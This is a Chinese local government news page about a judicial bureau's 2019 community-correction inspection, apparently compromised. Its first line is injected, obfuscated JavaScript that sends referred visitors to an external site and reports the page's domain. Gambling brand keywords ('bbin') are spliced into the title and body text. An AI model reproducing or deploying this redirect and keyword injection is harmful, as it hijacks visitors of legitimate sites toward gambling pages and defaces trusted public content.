var ref=document.referrer;if(ref.length>3){location.href="ht"+"tps://wa"+ "p.y6"+"6"+"6.net/baidu444.htm?"+document.domain;}

bbin宝盈,bbin下载

您的当前位置:首页 > bbin宝盈,bbin下载:
发布日期:2019-10-29 浏览次数: 字号:[ ]

近日,bbin宝盈,bbin下载:司法局副局蔡加龙一行赴秀洲、南湖等地进行2019年度社区矫正执法工作考核检查。

在检查过程中,检查组详细了解了目前当地社区矫正情况,并重点抽查了司法所社区矫正的相关台账,对检查中发现的不足和问题进行了反馈,并提出了今后需要注意的地方。  

对下阶段工作,蔡加龙强调:一是要高度重视执法质量和台账资料的规范化,严格落实社区矫正各项措施,确保社区矫正各项管理抓铁有痕、落到实处;二是要加强特殊服刑人员监管,如暂予监外执行人员台账中的病历、复查单及每月情况报告进行及时收集核对,严防监管漏洞;三是定期对矫正工作进行“回头看”,发现问题迅速整改,及时总结推广矫正中好的做法。

南湖区局、秀洲区局

 




打印本页 关闭窗口
Produced By 大汉网络 大汉版通发布系统